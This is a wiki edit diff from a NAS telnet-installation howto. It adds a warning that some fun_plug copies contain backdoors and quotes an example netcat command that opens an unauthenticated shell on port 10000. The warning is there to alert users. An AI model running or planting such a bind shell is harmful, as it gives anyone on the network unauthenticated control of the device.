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===== Download Telnet ===== | ===== Download Telnet ===== | ||
- | **WARNING** Be careful what you download. Some copies of funplug contain backdoors like using nc (netcat) to allow unauthenticated access to port 1000. Running netcat like this may cause the unmount problems described above. | + | **WARNING** Be careful what you download. Some copies of fun_plug contain backdoors like using nc (netcat) to allow unauthenticated access to port 10000. Running netcat like this may cause the unmount problems described above. |
+ | E.g. | ||
+ | /mnt/HD_a2/nc -l -p 10000 -e /bin/sh & | ||
- | Next step is to dowload the files required. [[http://forum.dsmg600.info/profile.php?id=47|KRH]] kindly provided them for us and you can now download them from here: {{:howto:utelnet-kit.tar.gz}}. For Windows Users: :!: Dont use WinZIP - try 7-Zip or WinRAR instead :!: | + | Next step is to dowload the files required. [[http://dns323.kood.org/forum/profile.php?id=47|KRH]] kindly provided them for us and you can now download them from here: {{:howto:utelnet-kit.tar.gz}}. For Windows Users: :!: Dont use WinZIP - try 7-Zip or WinRAR instead :!: |
From this file, extract the following files: | From this file, extract the following files: | ||
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* utelnetd | * utelnetd | ||
* busybox3 | * busybox3 | ||
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===== Installing Telnet ===== | ===== Installing Telnet ===== | ||
- | When all files are extracted you need to install them. This can be achieved in several ways covered in the [[fun_plug]] howto. The most important is that the files resides on the first disc and in the following structure and that they have rights to //execute//. | + | When all files are extracted you need to install them. This can be achieved in several ways covered in the [[fun_plug]] howto. The most important is that the files reside on the first disc and in the following structure and that they have rights to //execute//. |
<code bash> | <code bash> |